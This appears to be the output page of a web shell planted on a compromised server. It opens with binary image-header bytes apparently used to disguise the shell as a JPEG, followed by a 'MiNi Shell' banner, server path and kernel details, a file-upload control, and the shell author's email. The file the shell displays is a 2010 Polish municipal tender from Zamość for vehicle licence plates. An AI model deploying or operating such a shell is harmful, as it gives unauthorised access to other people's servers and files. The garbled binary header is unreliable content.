JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100118/11803-N-2010.html

<p class="kh_header"><b>Zamość: Wykonanie i dostawa tablic  rejestracyjnych                     dla Miasta Zamość - Wydział Komunikacji</b><br>
<b>Numer ogłoszenia: 11803 - 2010; data zamieszczenia: 18.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zamość , Rynek Wielki 13, 22-400 Zamość, woj. lubelskie, tel. 084 6392084, faks 084 6393054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i dostawa tablic  rejestracyjnych                     dla Miasta Zamość - Wydział Komunikacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem przetargu nieograniczonego jest wykonanie i dostawa tablic  rejestracyjnych                     dla Miasta Zamość - Wydział Komunikacji
2.	Wykaz tablic rejestracyjnych : 
2.1.	Tablice samochodowe jednorzędowe zwyczajne, w tym tablice rejestracyjne indywidualne wg potrzeb - kpl. 4.900  (9.800  szt)    
2.2.	Tablice samochodowe dwurzędowe zwyczajne, w tym tablice rejestracyjne indywidualne wg potrzeb -kpl. 100 ( 200 szt.)
2.3.	Tablice samochodowe jednorzędowe zwyczajne pojedyncze ( dla przyczep) - 250 szt.     
2.4.	Tablice samochodowe dwurzędowe zwyczajne pojedyncze  ( dla przyczep ) - 50 szt.         
2.5.	Tablice motocyklowe zwyczajne, w tym tablice indywidualne wg  potrzeb - 300 szt.        

2.6.	Tablice motorowerowe -  150 szt.  
                                                                           
3.	Tablice rejestracyjne muszą być wykonane zgodnie z wzorami i warunkami technicznymi określonymi w rozporządzeniu Ministra Infrastruktury z dnia   22 lipca 2002r. w sprawie rejestracji i oznaczenia pojazdów (t.j. Dz.U. z 2007r. nr 186,   poz. 1322)
4.	Miejsce realizacji zamówienia - dostawa : Wydział Komunikacji Urzędu Miasta Zamość                 ul. Partyzantów 3, 22-400 Zamość
5.	Warunki : 
a)	Dostawa tablic rejestracyjnych partiami wg zamówienia w zależności  od zapotrzebowania Zamawiającego
b)	Dostawa tablic rejestracyjnych - każdej zamówionej partii - na koszt Wykonawcy
c)	Termin dostawy tablic rejestracyjnych zwyczajnych - w ciągu jednego dnia roboczego                          od dnia złożenia zamówienia
d)	Termin dostawy wtórników tablic oraz tablic rejestracyjnych indywidualnych   w ciągu jednego dnia  roboczego od dnia zamówienia
e)	W przypadku stwierdzenia wad uniemożliwiających użytkowanie któregokolwiek                                 z materiałów, będących przedmiotem zamówienia, Wykonawca dokona wymiany tablic na nowe w terminie 7 dni  roboczych od daty ich zgłoszenia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.50.00-2, 44.31.64.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 7.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące : 
7.1.1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
7.1.2.	Posiadania wiedzy i doświadczenia
7.1.3.	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - Zamawiający nie wyznacza szczegółowych warunków w tym zakresie
7.1.4.	Sytuacji ekonomicznej i finansowej - Zamawiający nie wyznacza szczegółowych warunków w tym zakresie
7.2.	Ocena spełnienia warunków udziału w postępowaniu  będzie prowadzona  w oparciu                            o przedłożone przez Wykonawców oświadczenia i dokumenty. 
7.3.	Jako spełniający warunki udziału w postępowaniu zostaną ocenieni Wykonawcy, którzy :
7.3.1.	w zakresie warunku 7.1.1. - wykażą spełnienie warunków dotyczących posiadania :
a)	ważnego certyfikatu ITS, uprawniającego do oznaczania wyrobów bezpieczeństwa
b)	aktualnego zezwolenia na produkcję tablic rejestracyjnych - zgodnie    z art. 75a ustawy z dnia 20 czerwca 1997r Prawo o ruchu drogowym   (t.j. Dz.U. z 2005r Nr 108 poz. 908        z późn. zm.)
c)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie                           do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej
7.3.2.	w zakresie warunku 7.1.2. - wykażą spełnianie warunku dotyczącego wykonania                                   min. 1 dostawy tablic rejestracyjnych w ilości co najmniej 5.000 szt.
7.4.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania przedmiotu zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących  go z nimi stosunków.
7.5.	Wykonawcy, którzy nie wykażą spełniania wymaganych warunków zostaną wykluczeni                       z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta, wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu i niepodleganiu wykluczeniu z postępowania                       oraz dokumenty i inne elementy potwierdzające,   że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego:

8.1.	Oferta powinna składać się z wypełnionego formularza ofertowego, o treści zgodnej                          z określoną we wzorze stanowiącym załącznik nr 1 do SIWZ
8.2.	Oświadczenia lub dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:
8.2.1.	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu    (wg załącznika nr 2 do SIWZ ) w zakresie : 
a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
b)	posiadania wiedzy i doświadczenia
c)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi                          do wykonania zamówienia
d)	sytuacji ekonomicznej i finansowej
8.2.2.	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy  i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go  z nimi stosunków
8.2.3.	Dokumenty wymienione w pkt 8.3. dla podmiotów, o których mowa  pkt 8.2.2. jeżeli podmioty te będą brały udział w wykonywaniu zamówienia
8.2.4.	Ważny certyfikat ITS, uprawniający do oznaczania wyrobów bezpieczeństwa
8.2.5.	Aktualne zezwolenie na produkcję tablic rejestracyjnych - zgodnie   z art. 75a ustawy z dnia 20 czerwca 1997r Prawo o ruchu drogowym (t,j, Dz.U.  z 2005r Nr 108 poz. 908 z późn. zm.)
8.2.6.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie  do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
8.2.7.	Wykaz wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert,                     a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dostaw -  min. 1 dostawa tablic rejestracyjnych w ilości co najmniej 5.000 szt. (wg załącznika nr 3 do SIWZ)                        oraz załączeniem dokumentu, potwierdzającego, że dostawy te zostały wykonane należycie.
8.2.8.	W przypadku dostaw wykonywanych uprzednio w ramach konsorcjum i spółek cywilnych wykaz dostaw określonych w pkt 8.2.7. winien potwierdzać doświadczenie Wykonawcy (ów), składającego (ych) ofertę tzn. :  w przypadku zamówienia wykonywanego wspólnie z innym bądź innymi Wykonawcami, wykaz powinien wskazywać jedynie zakres i wartość prac wykonanych przez Wykonawcę (ów) składającego (ych) ofertę w tym postępowaniu
8.3.	W celu wykazania braku podstaw do wykluczenia Wykonawcy  z postępowania  o udzielenie zamówienia publicznego w okolicznościach, o których mowa   w art. 24 ust. 1 ustawy Prawo zamówień publicznych:
8.3.1.	Oświadczenie Wykonawcy o braku podstaw do wykluczenia z postępowania  na podstawie art. 24 ust. 1   ustawy z dnia 29 stycznia 2004r Prawo zamówień publicznych (wg załącznika nr 4 do SIWZ)
8.3.2.	 Aktualny odpis  z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,                             a w stosunku do osób fizycznych oświadczenie w zakresie art.24 ust. 1 pk 2 ustawy
8.3.3.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,                          że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej                              niż 3 miesiące przed upływem terminu składania ofert
8.3.4.	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega                              z opłacaniem składek na ubezpieczenia zdrowotne i społeczne lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
8.4.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie  zamówienia:
8.4.1.	Dokumenty wymagane w pkt 8.2.4, 8.2.5, 8.2.6. oraz 8.3.2., 8.3.3., 8.3.4. winien złożyć każdy Wykonawca
8.4.2.	Pozostałe dokumenty oraz oświadczenia z  art. 22 ust. 1 i 24 ust. 1 ustawy Prawo zamówień publicznych mogą być złożone wspólnie przez Wykonawców lub oddzielnie 
8.5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w  pkt 8.3.2.-8.3.4. składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że : 
8.5.1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument powinien być wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
8.5.2.	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenia społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -dokument powinien być  wystawiony  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
8.5.3.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie - dokument powinien być wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
8.6.	Jeżeli w miejscu zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów, zastępuje się je  dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zamosc.um.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (materiały przetargowe) można także uzyskać nieodpłatnie w siedzibie Zamawiającego: Urząd Miasta Zamość ul. Rynek Wielki 13,22-400 Zamość, pokój  nr 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2010 godzina 10:00, miejsce: Urząd Miasta Zamość, Rynek Wielki 13 (Ratusz), 22-400 Zamość
sekretariat Prezydenta Miasta, pokój nr 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Urząd Miasta Zamość
Rynek Wielki 13, 22-400 Zamość
(Ratusz) pokój nr 12, dnia 29.01.2010r. o godz. 10:30

Creat By MiNi SheLL
Email: jattceo@gmail.com